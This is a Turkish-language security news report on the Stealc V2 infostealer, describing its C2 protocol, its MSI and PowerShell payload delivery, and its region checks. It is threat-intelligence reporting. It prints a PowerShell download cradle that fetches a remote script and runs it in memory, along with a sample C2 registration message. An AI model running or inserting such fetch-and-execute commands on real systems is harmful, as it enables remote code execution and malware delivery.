Ocak 2023’ten bu yana etkin olan popüler bir bilgi stealer ve kötü amaçlı yazılım indiricisi olan Stealc, Mart 2025’te sürüm 2 (V2) tanıtımı ile önemli bir güncelleme aldı.
Bu en son yineleme, modern bir komut ve kontrol (C2) iletişim protokolü ve son varyantlarda RC4 şifrelemesinin entegrasyonu da dahil olmak üzere kötü amaçlı yazılım yeteneklerine önemli geliştirmeler getirir, bu da tespit edilmesini ve analiz edilmesini zorlaştırır.
Stealc V2’deki en önemli iyileştirmelerden biri, yük dağıtım seçeneklerinin genişlemesidir.
.png
)
Önceki sürüm yalnızca Exe ve DLL dosyalarını yürütebilirken, yeni sürüm artık Microsoft Yazılım Yükleyicisi (MSI) paketleri ve PowerShell komut dosyaları aracılığıyla kötü amaçlı yükler sağlayabilir ve saldırı yüzeyini ve potansiyel enfeksiyon vektörlerini önemli ölçüde genişletebilir.
Kötü amaçlı yazılım ayrıca, tehdit aktörlerinin coğrafi konum, donanım kimlikleri (HWID) ve yüklü yazılım gibi çeşitli faktörlere dayalı olarak yük dağıtım kurallarını özelleştirmesine izin veren entegre bir oluşturucuya sahip yeniden tasarlanmış bir kontrol paneline sahiptir.
Ek geliştirmeler arasında çoklu monitör ekran görüntüsü yakalama özellikleri, birleşik bir dosya kapma ve kimlik bilgileri için sunucu tarafı bruteforcing bulunur.
Zscaler araştırmacıları, Stealc V2’nin C2 altyapısı için sofistike bir JSON tabanlı iletişim protokolü kullandığını belirledi.
.webp)
Araştırmacılar, kötü amaçlı yazılımların, yinelenen örnekleri kontrol etmek ve sistem dilinin Bağımsız Devletler Topluluğu’nda (CI) konuşulmadığını doğrulamak da dahil olmak üzere, bu bölgeleri hedeflemenin potansiyel bir kaçındığını gösteren birkaç doğrulama adımı gerçekleştirdiğini belirtti.
Enfeksiyon işlemi, aşağıdaki örnek kodda gösterildiği gibi bir bot kimliği (HWID) ve botnet kimliği (Build) içeren enfeksiyonu kaydetmek için ilk istekle başlar:-
{
build: "main1",
hwid: "A9CAA24C-E7F3-3B20-0F54-4BE8A7DC2330",
type: "create"
}Gelişmiş Yük Teslimat Mekanizmaları
STEALC V2’deki yeni yük getirisi özellikleri, kötü amaçlı yazılımların işlevselliğinde önemli bir evrimi temsil eder.
MSI paketlerini yürütmek için, kötü amaçlı yazılım, kullanıcı etkileşimini en aza indirmek için sessiz /pasif parametreyle msiexec.exe yardımcı programını kullanır ve kurulumu daha gizli hale getirir.
İlk kurulum başarısız olursa, kötü amaçlı yazılım 10 kez yeniden dener ve kalıcılığını gösterir.
PowerShell Script yürütme için Stealc V2, komutla daha doğrudan bir yaklaşım kullanır: powershell.exe -nop -c iex(New-Object Net.WebClient).DownloadString('[payload]').
Bu yöntem, kötü amaçlı yazılımların uzak komut dosyalarını diske yazmadan doğrudan bellekte yürütmesini sağlar ve algılamayı daha zor hale getirir.
MSI paketleri ve yürütülebilir dosyalardan farklı olarak, Stealc V2 başarısız PowerShell komut dosyası yürütmelerini yeniden denemeye çalışmaz.
Bu gelişmiş dağıtım mekanizmaları, tehdit aktörlerinin STEALC V2’yi çeşitli yöntemler aracılığıyla dağıtmasına izin vererek, geleneksel yürütülebilir dosyalara odaklanabilecek güvenlik kontrollerini etkili bir şekilde atlar.
MSIExec.exe ve PowerShell gibi meşru Windows yardımcı programlarını kullanma yeteneği, kötü amaçlı yazılımların normal sistem işlemleriyle karışması için modern kötü amaçlı yazılım yazarları tarafından kullanılan giderek daha sofistike taktikleri vurgulamak için fırsatlar yaratır.
Are you from the SOC and DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.